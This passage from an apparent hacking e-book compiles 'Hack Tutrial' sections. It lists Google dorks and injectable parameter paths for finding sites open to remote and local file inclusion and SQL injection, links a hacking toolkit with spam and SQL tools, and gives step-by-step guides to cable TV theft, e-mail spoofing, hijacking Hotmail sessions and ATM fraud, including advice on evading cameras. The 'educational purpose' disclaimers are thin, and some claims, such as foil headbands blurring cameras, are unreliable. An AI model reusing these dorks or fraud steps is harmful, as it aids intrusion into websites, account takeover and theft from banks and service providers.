R.F.I STANDS FOR REMOTE FILE INCLUSION .MY PURPOSE OF POSTING THE DORKS HERE IS ONLY FOR EDUCATIONAL PURPOSE . /MODULES /COPPERMINE/THEMES /DEFAULT /THEME .PHP?THEME_DIR= /MODULES /4NALBUM/PUBLIC/DISPLAYCATEGORY.PHP?BASEPATH= /MODULES /COPPERMINE/THEMES /COPPERCOP /THEME.PHP?THEME_DIR= /MODULES /COPPERMINE/THEMES /MAZE /THEME.PHP?THEME_DIR= /MODULES /COPPERMINE/THEMES /DEFAULT /THEME .PHP?THEME_DIR= /MODULES /COPPERMINE/INCLUDE/INIT.INC .PHP?CPG_M_DIR= /COMPONENTS/COM_EXTCALENDAR /ADMIN_EVENTS.PHP?CONFIG_EXT[LANGUAGES_DIR]= /COMPONENTS/COM_LOUDMOUNTH/INCLUDES/ABBC /ABBC.CLASS .PHP?MOSCONFIG_ABSOLUTE_PA TH= /COMPONENTS/COM_ SMF/SMF.PHP?MOSCONFIG_ABSOLUTE_PATH = /COMPONENTS/COM_VIDEODB/CORE/VIDEODB .CLASS.XML .PHP?MOSCONFIG_ABSOLUTE _PATH= /COMPONENTS/COM_ SIMPLEBOARD /IMAGE_UPLOAD .PHP?SBP= /COMPONENTS/COM_ SIMPLEBOARD /FILE_UPLOAD.PHP?SBP= /COMPONENTS/COM_HASHCASH/SERVER.PHP?MOSCONFIG_ABSOLUTE_PATH = /COMPONENTS/COM_HTMLAREA3_XTDC/POPUPS /I MAGEM ANAGER /CONFIG.INC.PHP? MOSC ONFIG_ABSOLUTE _PATH = /COMPONENTS/COM_ SITEMAP/SITEMAP.XML.PHP?MOSCONFIG_ABSOLUTE _PATH= /COMPONENTS/COM_FORUM/DOWNLOAD.PHP?PHPBB_ROOT_PATH= /COMPONENTS/COM_PCCOOKBOOK/PCCOOKBOOK.PHP?MOSCONFIG_ABSOLUTE_ PATH= /COMPONENTS/COM_EXTCALENDAR /EXTCALENDAR .PHP?MOSCONFIG_ABSOLUTE _PATH= /COMPONENTS/MINIBB /INDEX.PHP?ABSOLUTE _PATH = Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 136
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree /COMPONENTS/COM_ SMF/SMF.PHP?MOSCONFIG_ABSOLUTE_PATH = /COMPONENTS/COM_POLLXT/CONF.POLLXT.PHP?MOSCONFIG_ABSOLUTE_PATH = /COMPONENTS/COM_LOUDMOUNTH/INCLUDES/ABBC /ABBC.CLASS .PHP?MOSCONFIG_ABSOLUTE_PA TH= /COMPONENTS/COM_VIDEODB/CORE/VIDEODB .CLASS.XML .PHP?MOSCONFIG_ABSOLUTE _PATH= /COMPONENTS/COM_PCCHESS/INCLUDE.PCC ESS .PHP ?MOSCONFIG_ABSOLUTE _PATH DORK: “POWERED BY EQDKP” RFI OF THIS DORK : /INCLUDES/DBAL.PHP? EQDKP _ROOT _PATH= INURL:” TEMPLATE.PHP? GOTO=” INURL:” VIDEO.PHP? CONTENT=” INURL:” PAGES.PHP? PAGE=” INURL:” INDEX1.PHP? CHOIX =” INURL:” INDEX1. PHP ? MENU =” INURL:” INDEX2.PHP? ASCII_ SEITE=” DORK: INURL:SURVEYS RFI TO THIS DORK : /SURVEYS/ SURVEY.INC.PHP? PATH= INURL:” INDEX.PHP ? BODY =” DORK: ALLINURL:ADOBT SITEL RFI TO THIS DORK : /CLASSES /ADODBT /SQL. PHP? CLASSES_DIR = DORK : “POWERED BY SCOZ NEWS” RFI TO THIS DORK : /SOURCES/FUNCTIONS.PHP?CONFIG[ MAIN_PATH]= RFI TO THIS DORK : /SOURCES/TEMPLATE.PHP ?CONFIG[ MAIN_PATH]= INURL:” KB_CONSTANTS .PHP? MODULE_ROOT_PATH=” DORK: ALLINURL :” MCF.PHP” RFI TO THIS DORK: /MCF.PHP? CONTENT = DORK: INURL:” MAIN .PHP? SAYFA =” RFI TO THIS DORK : /MAIN .PHP?SAYFA= DORK: “MOBILEPUBLISHER PHP” RFI TO THIS DORK : /HEADER.PHP?ABSPATH = DORK: “POWERED BY PHP COIN 1.2.3? RFI TO RHIS DORK : /COIN_INCLUDES/CONSTANTS.PHP?_CCFG[_PKG_PATH_INCL]= ALLINURL:LOGIN.PHP?DIR= INURL:” INDEX.PHP? GO=” INURL:” INDEX1. PHP?=” INURL:” LIB/GORE .PHP? LIBPATH =” INURL:” INDEX2. PHP ? P=” Hack Tutrial:DORKS LIST FOR L.F.I
Here is the list of L.F.I dorks.L.F.I stand for Local File Inclusion , my purpose of posting the dorks here is only for educational purpose. acion=act=action=API_HOME_DIR=board=cat=client_id=cmd=cont=current_frame=date=det ail=dir=display=download=f=file=fileinclude=filename=firm_id=g=getdata=go=HT=idd=inc=in cfile=incl=include_file=include_path=infile==ir=lang=language=link=load=main=mainspot=ms g= num= openfile= p= page= pagina= path= path_to_calendar= pg= plik qry_str= ruta= safehtml= section= showfile= side= site_id= skin= static= str= strona= sub= tresc= url= user= v= Hack Tutrial:DORKS LIST SQL INJECTIONS .
Here is the huge list of dorks which you can use in google for searching vulnerable links for SQL Injections , Please i am not responsible for any harm you do or cause.I am posting the dorks here only for educational purpose. Dork: SQL Injectioninurl:"id=" & intext:"Warning: mysql_fetch_assoc()inurl:"id=" & intext:"Warning: mysql_fetch_array()inurl:"id=" & intext:"Warning: mysql_num_rows()inurl:"id=" & intext:"Warning: session_start()inurl:"id=" & intext:"Warning: getimagesize()inurl:"id=" & intext:"Warning: is_writable()inurl:"id=" & intext:"Warning: getimagesize()inurl:"id=" & intext:"Warning: Unknown()inurl:"id=" & Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 137
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree intext:"Warning: session_start()inurl:"id=" & intext:"Warning: mysql_result()inurl:"id=" & intext:"Warning: pg_exec()inurl:"id=" & intext:"Warning: mysql_result()inurl:"id=" & intext:"Warning: mysql_num_rows()inurl:"id=" & intext:"Warning: mysql_query()inurl:"id=" & intext:"Warning: array_merge()inurl:"id=" & intext:"Warning: preg_match()inurl:"id=" & intext:"Warning: ilesize()inurl:humor.php?id= inurl:aboutbook.php?id=inurl:ogl_inet.php?ogl_id=inurl:fiche_spectacle.php?id=inurl:sem.php 3?id=inurl:kategorie.php4?id=inurl:news.php?id=inurl:index.php?id=inurl:faq2.php?id=inurl: show_an.php?id=inurl:preview.php?id=inur:loadpsb.php?id=inurl:opinions.php?id=inurl:spr. php?id=inurl:pages.php?id=inurl:announce.php?id=inurl:clanek.php4?id=inurl:participant.ph p?id=inurl:download.php?id=inurl:main.php?id=inurl:review.php?id=inurl:chappies.php?id=i nurl:read.php?id=nurl:prod_detail.php?id=nurl:viewphoto.php?id=inurl:article.php?id=inurl: person.php?id=inurl:produinfo.php?id=inurl:showimg.php?id= inurl:website.php?id=inurl:hosting_info.php?id=inurl:gallery.php?id=inurl:rub.php?idr= inurl:view_faq.php?id=inurl:artikelinfo.php?id=inurl:detail.php?ID=inurl:index.php?=inurl:pr ofile_view.php?id=inurl:category.php?id=inurl:publications.php?id=inurl:fellows.php?id=inurl :downloads_info.php?id=inurl:prod_info.pp?id=inurl:shop.php?do=part&id=inurl:productinfo .php?id=inurl:collectionitem.php?id=inurl:band_info.php?id=inurl:product.php?id= inurl:releases.php?id=inurl:ray.php?id=inurl:produit.php?id=inurl:pop.php?id=:shopping.php ?id=inurl:productdetail.php?id=inurl:post.php?id=inurl:viewshowdetail.php?id=inurl:clubpag e.php?id=inurl:memberInfo.php?id=inurl:section.php?id=inurl:theme.php?id=inurl:page.php? id=inurl:shreddercategories.php?id=inurl:tradeCategory.php?id=inurl:producges_view.php?I D=inurl:shop_category.php?id=inurl:transcript.php?id=inurl:channel_id= inurl:item_id=inurl:newsid=inurl:trainers.php?id=inurl:newsfull.php?id=inurl:news_display.p hp?getid=inurl:index2.php?option=inurl:readnews.php?id=inurl:top10.php?cat=inurl:newsone. php?id=inurl:event.php?id=inurl:productitm.php?id=inurl:sql.php?id=inurl:aboutbook.php?id =inurl:preview.php?id=inurl:loadpsb.php?id=:pages.php?id=inurl:material.php?id=inurl:clane k.php4?id=inurl:announce.php?id=inurl:chappies.php?id= inurl:read.php?id=inurl:viewapp.php?id=inurl:viewphoto.php?id=inurl:rub.php?idr=inurl:gal eri_info.php?l=inurl:review.php?id=inurl:iniziativa.php?in=inurl:curriculum.php?id=inurl:lab els.php?id=:story.php?id=inurl:look.php?ID=inurl:newsone.php?id=inurl:aboutbook.php?id=i nurl:material.php?id=inurl:opinions.php?id=inurl:announce.p?id=inurl:rub.php?idr= inurl:galeri_info.php?l=inurl:tekst.php?idt=inurl:newscat.php?id=inurl:newsticker_info.php?i dn=inurl:rubrika.php?idr=inurl:rubp.php?idr=inurl:offer.php?idf=inurl:art.php?idm=inurl:tit le.php?id=inurl:index.php?id=:trainers.php?idinurl:buy.php?category=inurl:article.php?ID=in urllay_old.php?id=inurl:declaration_more.php?decl_id=inurlageid= inurl:games.php?id= Hack Tutrial:PAKI HACKING TOOLKIT V 1.0 A gift for all Pakistani Peoples around the globe on occasion of 14th August. I sincerely hope, you like my this effort.Paki Hacking ToolKit v 1.0 which contains
Following Features:-
MD5 TOOL
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 138
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Spam
SQL Tool
Encryption & Decrypter
ASCII Art
Ping Web
Google Dorks Scanner
Requirements==>Require .Net Framework 4.0 to run this application. *If you are on Windows XP then you would have to install .Net Framework 2.0 as wellDownload Link for .NET Framework 2.0: Here(http://www.microsoft.com/download/en/details.aspx?id=19 ) Download Link for .NET Framework 4.0: Here(http://www.microsoft.com/download/en/details.aspx?id=17851 ) ==>And it will be run on All Microsoft Operating systems==>Minimum requirement Windows Xp==>Don't remove any file inside RES folder Download app from Here(http://www.mediafire.com/?hqwrtvyrclgaxh4 ) Hack Tutrial:All Mirc Commands. All mIRC Commands / Recalls the previous command entered in the current window. /! Recalls the last command typed in any window. /action {action text} Sends the specifed action to the active channel or query window. /add [-apuce] {filename.ini} Loads aliases, popups, users, commands, and events. /ame {action text} Sends the specifed action to all channels which you are currently on. /amsg {text} Sends the specifed message to all channels which you are currently on. /auser {level} {nick|address} Adds a user with the specified access level to the remote users list. /auto [on|off|nickname|address] Toggles auto-opping of a nick or address or sets it on or off totally. /away {away message} Sets you away leave a message explaining that you are not currently paying attention to IRC. /away Sets you being back. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 139
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree /ban [#channel] {nickname} [type] Bans the specified nick from the curent or given channel. /beep {number} {delay} Locally beeps 'number' times with 'delay' in between the beeps. /channel Pops up the channel central window (only works in a channel). /clear Clears the entire scrollback buffer of the current window. /ctcp {nickname} {ping|finger|version|time|userinfo|clientinfo} Does the given ctcp request on nickname. /closemsg {nickname} Closes the query window you have open to the specified nick. /creq [ask | auto | ignore] Sets your DCC 'On Chat request' settings in DCC/Options. /dcc send {nickname} {file1} {file2} {file3} ... {fileN} Sends the specified files to nick. /dcc chat {nickname} Opens a dcc window and sends a dcc chat request to nickname. /describe {#channel} {action text} Sends the specifed action to the specified channel window. /dde [-r] {service} {topic} {item} [data] Allows DDE control between mIRC and other applications. /ddeserver [on [service name] | off] To turn on the DDE server mode, eventually with a given service name. /disable {#groupname} De-activates a group of commands or events. /disconnect Forces a hard and immediate disconnect from your IRC server. Use it with care. /dlevel {level} Changes the default user level in the remote section. /dns {nickname | IP address | IP name} Uses your providers DNS to resolve an IP address. /echo [nickname|#channel|status] {text} Displays the given text only to YOU on the given place in color N. /enable {#groupname} Activates a group of commands or events. /events [on|off] Shows the remote events status or sets it to listening or not. /exit Forces mIRC to closedown and exit. /finger Does a finger on a users address. /flood [{numberoflines} {seconds} {pausetime}] Sets a crude flood control method. /fsend [on|off] Shows fsends status and allows you to turn dcc fast send on or off. /fserve {nickname} {maxgets} {homedirectory} [welcome text file] Opens a fileserver. /guser {level} {nick} [type] Adds the user to the user list with the specified level and address type. /help {keyword} Brings up the Basic IRC Commands section in the mIRC help file. /ignore [on|off|nickname|address] Toggles ignoring of a nick or address or sets it on or off totally. /invite {nickname} {#channel} Invites another user to a channel. /join {#channel} Makes you join the specified channel. /kick {#channel} {nickname} Kicks nickname off a given channel. /list [#string] [-min #] [-max #] Lists all currently available channels, evt. filtering for parameters. /log [on|off] Shows the logging status or sets it on or off for the current window. /me {action text} Sends the specifed action to the active channel or query window. /mode {#channel|nickname} [[+|-]modechars [parameters]] Sets channel or user modes. /msg {nickname} {message} Send a private message to this user without opening a query window. /names {#channel} Shows the nicks of all people on the given channel. /nick {new nickname} Changes your nickname to whatever you like. /notice {nick} {message} Send the specified notice message to the nick. /notify [on|off|nickname] Toggles notifying you of a nick on IRC or sets it on or off totally. /onotice [#channel] {message} Send the specified notice message to all channel ops. /omsg [#channel] {message} Send the specified message to all ops on a channel. /part {#channel} Makes you leave the specified channel. /partall Makes you leave all channels you are on. /ping {server address} Pings the given server. NOT a nickname. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 140
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree /play [-c] {filename} [delay] Allows you to send text files to a window. /pop {delay} [#channel] {nickname} Performs a randomly delayed +o on a not already opped nick. /protect [on|off|nickname|address] Toggles protection of a nick or address or sets it on or off totally. /query {nickname} {message} Open a query window to this user and send them the private message. /quit [reason] Disconnect you from IRC with the optional byebye message. /raw {raw command} Sends any raw command you supply directly to the server. Use it with care!! /remote [on|off] Shows the remote commands status or sets it to listening or not. /rlevel {access level} Removes all users from the remote users list with the specified access level. /run {c:\path\program.exe} [parameters] Runs the specified program, evt. with parameters. /ruser {nick[!]|address} [type] Removes the user from the remote users list. /save {filename.ini} Saves remote sections into a specified INI file. /say {text} Says whatever you want to the active window. /server [server address [port] [password]] Reconnects to the previous server or a newly specified one. /sound [nickname|#channel] {filename.wav} {action text} Sends an action and a fitting sound. /speak {text} Uses the external text to speech program Monologue to speak up the text. /sreq [ask | auto | ignore] Sets your DCC 'On Send request' settings in DCC/Options. /time Tells you the time on the server you use. /timer[N] {repetitions} {interval in seconds} {command} [| {more commands}] Activates a timer. /topic {#channel} {newtopic} Changes the topic for the specified channel. /ulist [{|}]{level} Lists all users in the remote list with the specified access levels. /url [-d] Opens the URL windows that allows you to surf the www parallel to IRC. /uwho [nick] Pops up the user central with information about the specified user. /who {#channel} Shows the nicks of all people on the given channel. /who {*address.string*} Shows all people on IRC with a matching address. /whois {nickname} Shows information about someone in the status window. /whowas {nickname} Shows information about someone who -just- left IRC. /wavplay {c:\path\sound.wav} Locally plays the specified wave file. /write [-cidl] {filename} [text] To write the specified text to a .txt file. Hack Tutrial:Cable Theft File: Pay TV Decoder CABLE THEFT FILE PAY TV DECODER MATERIALS REQUIRED 1 Radio Shack mini-box ( #270-235) 1 - 1/4 watt resistor, 2.2k-2.4k ohm (RS #271-1325) 1 - 75pf-100pf variable capacitor (Hard to find) 2 - F61a chassis-type coaxial connectors (RS #278-212) 12" - No. 12 solid copper wire 12" - RG59 coaxial cable INSTRUCTIONS 1. Bare a length of No. 12 gauge solid copper wire and twist around a 3/8" nail or rod to form a coil of 9 turns. Elongate coil to a length of 1 1/2" inches and form right angle bends on each end. 2. Solder the varible capacitor to the coil. It doesn't matter where you solder it, it still does the same job. The best place for it is in the center with the adjustment screw facing upward. Note: When it comes time to place coil in box, the coil must be insulated from grounding. This can be done by crazy- glueing a piece of rubber to the bottom of the box, and securing the coil to it. 3. Tap coil Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 141
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree at points 2 1/2 turns from ends of coil and solder to coaxial chassis connectors, bringing tap leads through holes in chassis box. Use as little wire as possible.4. Solder resistor to center of coil and ground other end of resistor to chassis box, using solder lug and small screw. 5. Drill a 1/2" diameter hold in mini- box cover to permit adjustment of the variable capacitor from the outside. Inspect the device for defects in workmanship and place cover on mini- box. Tighten securely. 6. Place device in line with existing cable on either side of the coverter Box and connect to television set with the short piece of RG59 coaxial cable. Set television set to HBO channel. 7. Using a plastic screwdriver (nonmetallic), adjust the varible capacitor until picture tunes in. Sit back, relax, and enjoy!!! Hack Tutrial:Welcome to Hackerdevil's guide on how to send ANONYMOUS e-mails to someone without a prog. I am Hackerdevil and i am going to explain ya a way to send homemade e-mails. I mean its a way to send Annonimous e-mails without a program, it doesn't taketo much time and its cool and you can have more knowledge than with a stupid program that does all by itself.This way (to hackers) is old what as you are newby to this stuff, perhaps you may like to know how these anonymailers work, (home-made) Well..... Go to Start, then Run... You have to Telnet (Xserver) on port 25 Well, (In this Xserver) you have to put the name of a server without the ( ) of course... Put in iname.com in (Xserver) because it always work it is a server with many bugs in it. (25) mail port. So now we are like this. telnet iname.com 25 and then you hit enter Then When you have telnet open put the following like it is written helo and the machine will reply with smth. Notice for newbies: If you do not see what you are writing go to Terminal's menu (in telnet) then to Preferences and in the Terminal Options you tick all opctions available and in the emulation menu that's the following one you have to tick the second option. Now you will se what you are writing. then you put:mail from:<whoeveryouwant@whetheveryouwant.whetever.whatever> and so on... If you make an error start all over again Example: mail from:tahir@microsoft.com.net You hit enter and then you put:rcpt to:lamer@lamer'sworld.com This one has to be an existance address as you are mailing anonymously to him.Then you hit enter And you type Data and hit enter once more Then you write Subject:whetever And you hit enter you write your mail hit enter again (boring) you put a simple: Yes you don't see it its the Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 142
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree little hacking point! and hit enter Finally you write quit hit enter one more time and it's done look:Try first do it with yourself I mean mail annonymously yourself so you can test it! Don't be asshole and write fucking e-mails to big corps. bec' its symbol of stupidity and childhood and it has very very effect on Hackers they will treat you as a Lamer! Really i don't know why i wrote this fucking disclaimer, but i don't want to feel guilty if you get into trouble.... Disclamer:Hackerdevil is not responsable for whetever you do with this info. you can destribute this but you are totally forbidden to take out the "By Hackerdevil" line. You can't modify or customize this text and i am also not responsable if you send an e-mail to an important guy and insult him, and i rectly advise you that this is for educational porpouses only my idea is for learning and having more knowledge, you can not get busted with this stuff but i don't take care if it anyway happen to you. If this method is new for ya probably you aren't a hacker so think that if someone wrote you an e-mail "yourbestfirend@aol.com" insulting you and it wasn't him it but was some guy using a program or this info you won't like it.so Use this method if you don't care a a damn hell or if you like that someone insult you. Hack Tutrial:The Hotmail Hack This file is all about Hotmail free internet based e-mail and how to gain access to any account you want. (Well...almost). Anyways, I am not responsible for anything you do with the information in this file and all the rest of the preeching to do with illegal stuff. You may redistribute this file AS IS, you may not change the file in any way without my written permission. This is the first file that I have written as a hacker and I did it for the group which I have just joined, "The United Underground" also known as "u2". Anyways...enuphof this boring junk and on with the fun stuff!!!! First a little bit of explanation about hotmail for those of you who are constipated in the brain.Hotmail is, as I hope you know, a webased e-mail system. Which in turn means that it uses cgi-bin as a gateway to there local mashine where all the passwords are and e-mails are stored. Hotmail requires you to enter a login name on one page and a password on another, this is thefirst key to this hack. When in a Hotmail account there are many options you may choose such as reading mail deleting mail, changeing the interface and so on. The last option is the logout option, wich is the second key to this hack. For this hack you must know the user name of your victim..err...subject. This is always the name in front of the @ in their e-mail address, so that is easily obtained. You must also be using a browser which enables you to view the source code for the page you are currently viewing. That is really it...So what's the catch you say? Well yes...there is a catch, and I'm sure as I study the system more closely it will become obsolete. But for now, your subject MUST be stupid enough to either forget, or not bother to logout once they are done in the system. THAT IS THE KEY TO THIS HACK!!!!!!========== ==HOW TO== ==========Now for the steps of the hack......////// Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 143
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree step 1 //////The first step is to get the username of the subject and go to www.hotmail.com and login with that user name. Make sure you have typed the username exactly right because hotmail will not tell you if you have typed it incorrectly, they also log the IP's of people entering incorrect login names.////// step 2 /////It is now time to view the source code of the password page that you are on now. It should say www.hotmail.com/cgibin/password.cgi in the URL box. Anyways, view the source for this page. Five lines down or so from the top of the source code page, it will say <form name="passwordform" action="URL" method="POST" target="_top"> That is a very important line....but before I tell you how to use that line, I'm going to side track for a little theory behind this hack. Because there's NO point in a hack, if you don't know how it works. That is the whole idea of hacking, to find out how systems work. So anyways, when you login to hotmail, the cgi-bin gateway marks you as being IN the system.If you don't logout, and you just leave the page, or turn off your computer, the Hotmail system doesn't know that you are gone from your account. So back to the real text.The action="URL" part of the line above is where the subjects account is located. So after thereal owner of the account has loged in and given his/her password, they will go to a page that says......http://somenumber/cgi-bin//start/username/anothernumber in the URL box......////// step 3 /////Hmmmmm...funny thing, that's the same number that we obtained earlier in this text from the source code for the password page. So after you have that URL, you must type in into the URL box ONLY!!!! You can not click the open button, or use an open command for reasons that are way beond the grasp of this text. So after you've entered that URL, press enter, and watch as hotmail gives you complete access over the subjects Hotmail account. //////////////////////////////////////////////////////////////////// //////////////////////////// /Now remember that this hack ONLY works if the owner of the account does NOT logout from his/ / /her account. Also, please have mercey for the poor idiot on the other end that owns the / /account, and do not delete any messages or any shit like that. Just be happy that you DID / /gain access to the account and then leave. I have set up a hotmail account with a few e-mails/ /going in and out of there every once in a while. The address is oxyenn@hotmail.com (yes, that/ /is an extra n on oxygen, don't forget it). Hack this account freely, I realy don't care, but / /please don't go using it to compose harassing or anonomous e-mail. That is lame, and if I do / /find anyone doing it, I will find your IP from the login sequence, and trac you down, or, if / Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 144
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree /any legal action results in it, report your ip to the authorities. So please, it would be / /alot easier if you just co-operate. Thank you:) / //////////////////////////////////////////////////////////////////// //////////////////////////// This file was made for newbies, and those who are always looking to learn. Not for all you expirienced hackers who know it all, unless you realy wanted to read it. So don't bother mailing u2 or me (if you somehow get my e-mail address) flamming us or shit like that. Hack Tutrial:The Disk Jockey presents: Scamming ATM's (Automatic Teller Machines)Preface: ATM's are nothing new, banks have been using them for years, and now you see them being used more than ever, and are becoming more and more widespread. This, of course, just opens up more ways to make money, and I am again bringing you another safe and proven technique of improving your cash flow.Banks: As mentioned, almost all banks nowadays have ATM machines.Grab the local phone book and start calling banks. What you want to know is "What is the most I can take out of an ATM machine right after I deposit a check?" Most banks range anywhere from $50 to $1000. This is for when you make a deposit via the ATM, and then right away make a withdraw against the funds on the check, even though the check hasn't been verified. I'm sure you can see what's coming.Account:Open a savings account at the bank that offers the highest amount of ATM withdraw. Use a fake name (of course) and apply for the ATM card too. You might even tell them that you need the ATM card because you work odd hours, so it is difficult for you to get to the banks when they are open.Deposit:Soon you will get your ATM card in the mail, and it should be sent to your mailing address that would be a lot like a drop for carding. You should be able to figure out how to do that. Take your ATM card and go to the banks ATM machine. Select DEPOSIT and when it asks for amout, type in $999.00. DO NOT deposit an amount OVER $1000! This is important because then the check will have to wait for bank clearance, which means that you'll be screwed.When it's time to insert the deposit into the slot on the ATM, insert an empty envelope. For all the ATM knows, this was just a check for $999.00, and now places your account ledger at $999.00. Now you are free to withdraw up to the full $1000 that you are allowed. Since you never really put in any money, this is all free money coming out! I've done this myself and got $950 out of a machine. It was a HUGE stack of twenties! Just be on the watch for cameras! Have fun Hack Tutrial:-
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 145
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree +-------------------------------+ | | | A. T. M. Fraud Made Easy | | | | summary and research by | | Count Zero | | | | (A CHiNA Info-Net Prod) | | | +-------------------------------+ Have you ever looked longingly upon the sight of your local PULSE machine and thought, "There must be some way that I can make some money REAL easy here."?Well, there is. But it won't be easy. Protection methods can be overcome, but the technology involved must be understood IN ITS ENTIRETY before an [PAUSE] attempt at illegal access is to be made. There are hundreds of people, guests of the state, that figured their plans infallible, only to fall victim to a well-hidden camera. This article will not be a lesson on HOW to break into the machine, it is merely a summary of the operations involved with a normal ATM transaction. This information is being presented on a "for information's sake"-only basis. I, Count Zero, do not promote nor remotely condone any illegal acts of any sort. So there. I. MAGNETIC STRIP FORMAT This would seem to be the most efficient method of trying to access illegal sums of cash. You could a. steal somebody's card and PIN code b. synthesize a card c. attempt to "jackpot" the system We will only look at option B. As "A" is up to your own devices and "C" has several good text files written about it already. So "B" it is. [PAUSE] Let's look at the format of the data written to the magnetic strips. This has been taken from a recent HARTWELL, INC manual. [ XX XX XX XX XX XX XX XX ] [ YYYY ] [ - 20 CHARS - ] [ ZZ ZZ ZZ ] [ CC CC ] \-----------------------/ \------/ \--------------/ \----------/ \-------/ Your individual acct. PIN Name of card Bank route CHKSUM number/serial code Code issuee code/rem. access # For validation, each entry is written twice but not written here for ease of typing. But it is repeated in the form of: "ACCT NUM" "ACCT NUM" "PIN CODE" "PIN CODE" etc... These codes may be examined by building a simple code-reader as many have done which can be easily interfaced to your IBM-PC. Full Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 146
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree plans to be put into a future CHiNA newsletter. If you were to attempt to write a magnetic strip or change a currently existing one, you would need to be using a head-write circuit based on the popular Motorola BCX119221-A...C series of head control chips. NOTE: Make sure to change the last 2 values! They constitute the checksum of the entry. Merely add all existing characters written (only the first entry, not both [PAUSE] of them) using the following chart: CHARACTER VALUE -------------------------------0..9 0..9 A..Z 10..36 EOL 37 EOT 38 CLR 39 HMX 40 PTT 41 RIA-1 42 RIA-2 43 I doubt anyone in the communications biz needs an explanation of these terms so I'll move on. II.
ATM HARDWARE
Usually consists of:
[PAUSE] | A | \-----\
A. B. C. D. E. F.
-----------------------------------| | \-----\ | B | | -----------------------------------| | | ----------/---/ E | | / / / / ---- | | / C / / D / F | | / / / / ---- | | -----------/---/ | | | ------------------------------------
|
Camera Mount Hidden Voice-Activated recorder & printout link Display Monitor Options buttons Card Slot Receipt Slot
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 147
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Your machine may vary slightly. But the concept will almost always hold true. Simple rules for each. A. Wear a paper bag or mask. See also Part II A [PAUSE] B. Do NOT speak. This is the most crucial part! See also Part II A C. Nothing D. Wear gloves E. See Part I F. TAKE YOUR RECEIPT AND BURN IT!! One of the neat flaws in many machines made prior to 1989 involved the use of the "CANCEL" button. This button was made to be pressed when the user decided, at any time during the transaction, that he didn't wish to continue. The display would jump immediately to:"TRANSACTION CANCELLED - CHOOSEANOTHER?" This was all well and good, but the machines did not disable this feature between the time your cash was dispensed and you were prompted for your next activity. In effect, you could push the "CANCEL" button after your money has been withdrawn and it would not be added to your account record! THIS STILL WORKS IN MANY PLACES! OVER 85% OF ALL MACHINES MADE BEFORE MAR. 1989 STILL HAVE NOT BEEN UPGRADED. Although most machines of that period would only work if you were withdrawing amounts larger than $20 (usually $25 is the next possible choice!) [PAUSE] This is ideal if you are using another's card! II A. CAMERA/SOUND HARDWARE You can go other routes when dealing with camera systems. You do not have to wear a bag on your head (unless the cosmetic improvement is quite large)Thin alloy metal such as common aluminum/tin foil, which are full of impurities, react in a bizarre way when photographed through the special lenses that are commonly used. The effect is to "blur" or "bleed" the image, rendering it indestinguishable from an accident in your local Sherwin-Williams store. Most people prefer to make a "headband" of this metal, lined with copper wire in a sine wave pattern when accosting a machine. You should seriously consider this possibility! For further reading on this subject, consult: BANKER'S WORLD - Apr 1989 "Where Have All the Dollars Gone?" pp 24-29
[PAUSE] 1)
P. I. - Apr 1989 "The Last Straw" pp 37-41 (p 38 in particular has a nice diagram. Fig
Sounds, these articles also suggest an indirect method of dealing with the voice-activated recording device. Oddly, a pure square wave tone (roughly Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 148
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree around 3100 hz) will cause a major screwup in the sound-sensing abilities of the recorder. It usually will have to be replaced. Suggested volume, given at 6" range is 8.5+ db. Obviously, anything louder will do. An interesting side-note is that this has become a past-time of suburban teenagers! Well, hope this gets you started! More will be coming in the next exciting file! ---------------------------> OVER AND OUT! -----------> COUNT ZERO HAHAHAHA NAPPA IS A BUNCH OF FLY-BY-NIGHT LOSERS, EH CONFLICT?! Call us on: HYPERCARD BBS
(406) 538-2101 1200/2400 BAUD SYSOP: GEORGE VON JUNGLE
FAWLTY TOWERS
(202) 781-6420 2400 BAUD ONLY SYSOP: BASIL FAWLTY
(CHiNA Node #3) [PAUSE]
(CHiNA Node #9)
